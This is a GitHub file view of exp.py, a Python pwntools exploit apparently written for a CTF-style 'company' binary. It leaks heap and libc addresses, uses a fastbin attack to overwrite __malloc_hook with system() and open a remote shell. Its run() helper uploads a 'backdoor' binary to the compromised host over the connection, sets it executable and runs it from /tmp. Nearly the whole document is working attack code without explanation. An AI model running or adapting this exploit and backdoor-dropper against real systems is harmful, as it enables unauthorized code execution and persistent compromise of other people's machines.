-
Notifications
You must be signed in to change notification settings - Fork 10
/
exp.py
135 lines (110 loc) · 4.37 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
from pwn import *
import base64
debug = 0
slog = 0
local = 0
if slog: context.log_level = True
def run(sh, filename):
data = open(filename, 'r').read()
cmd = 'echo ' + base64.b64encode(data) + ' > /tmp/base64.txt;'
cmd += 'base64 -d /tmp/base64.txt > /tmp/backdoor;'
cmd += 'chmod +x /tmp/backdoor;'
cmd += 'rm /tmp/base64.txt;'
cmd += '/tmp/backdoor;echo FINISH'
sh.sendline(cmd)
sh.recvuntil('FINISH')
def pwn(ip, getshell = True):
if local:
p = process("./company")
libc = ELF('/lib32/libc-2.24.so')
else:
p = remote(ip, 4444)
libc = ELF('/lib32/libc-2.24.so')
def create(name,phone,length,description):
p.recvuntil(">>> ")
p.sendline("1")
p.recvuntil("Name: ")
p.sendline(name)
p.recvuntil("Enter Phone No: ")
p.sendline(phone)
p.recvuntil("Length of description: ")
p.sendline(str(length))
p.recvuntil("Enter description:", timeout = 0.5)
p.sendline(description)
def remove(name):
p.recvuntil(">>> ")
p.sendline("2")
p.recvuntil("company's name to remove? ")
p.sendline(name)
def edit(name,op,content, shell = False):
p.recvuntil(">>> ")
p.sendline("3")
p.recvuntil("Name to change? ")
p.sendline(name)
p.recvuntil(">>> ")
p.sendline(str(op))
if(op==1):
p.sendline(content)
else:
p.recvuntil("Length of description: ")
p.sendline(content[0])
if shell:
return
p.recvuntil("Description:", timeout = 0.5)
p.sendline(content[1])
def display():
p.recvuntil(">>> ")
p.sendline("4")
create('a', 'bbbb', 100, p32(0) + p32(0x11) + 'a'*8 + p32(0) + p32(0x11) + 'a'*8 + p32(0) + p32(0x11))
fake_heap = p32(0) + p32(0x41) + 'a'*0x8 + p32(0) + p32(0x31) + 'a'*8 + p32(0) + p32(0x21) + 'a'*0x18 + p32(0) + p32(0x31)
create('b', 'bbbb', 100, fake_heap)
#alter company->phone and company->description
printf_got = 0x804B010
heap_got = 0x804b124
edit('a', 1, 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(printf_got) + p32(heap_got) + 'b\x00')
#leak information
display()
p.recvuntil('Phone #: ')
p.recvuntil('Phone #: ')
heap_addr = u32(p.recv(4)) - 0x1428
print 'heap addr is ', hex(heap_addr)
p.recvuntil('Description: ')
printf_addr = u32(p.recv(4))
print 'printf addr is ', hex(printf_addr)
system_addr = printf_addr - libc.symbols['printf'] + libc.symbols['system']
print 'system addr is', hex(system_addr)
bin_sh = printf_addr - libc.symbols['printf'] + libc.search('/bin/sh').next()
malloc_hook = printf_addr - libc.symbols['printf'] + libc.symbols['__malloc_hook']
fake_fastbin = malloc_hook + 0x2c
#fastbin attack
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(heap_addr + 0x14c0) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
remove('b')
#create fake heap heap in main_arena
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(heap_addr + 0x14b0) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
edit('b', 2, (str(0x38), 'a'*8 + p32(0) + p32(0x31) + p32(0x20)))
edit('b', 2, (str(0x28), 'a'*8))
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(heap_addr + 0x14d0) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
remove('b')
#fastbin attack again
create('c', 'a', 0x38, 'a'*8 + p32(0) + p32(0x31) + 'a'*8 + p32(0) + p32(0x21) + p32(fake_fastbin))
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(heap_addr + 0x1430) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
edit('b', 2, (str(0x18), 'a'*8))
#control main_arena->top
print 'malloc_hook is', hex(malloc_hook)
create('d', 'a', 0x18, 'a'*20 + p32(malloc_hook - 0x8))
edit('a', 2, (str(0x70), p32(system_addr)))
payload = 'a\x00'.ljust(0x100, 'a') + p32(0x64) + p32(1) + p32(heap_addr + 0x1440) + p32(heap_addr + 0x1498) + 'b\x00'
edit('a', 1, payload)
#gdb.attach(p, open('debug'))
#call malloc('/bin/sh') which equals to system('/bin/sh')
edit('b', 2, (str(bin_sh), p32(system_addr)), True)
if getshell:
p.interactive()
else:
run(p, "./backdoor")
if __name__ == '__main__':
pwn('127.0.0.1', getshell = False)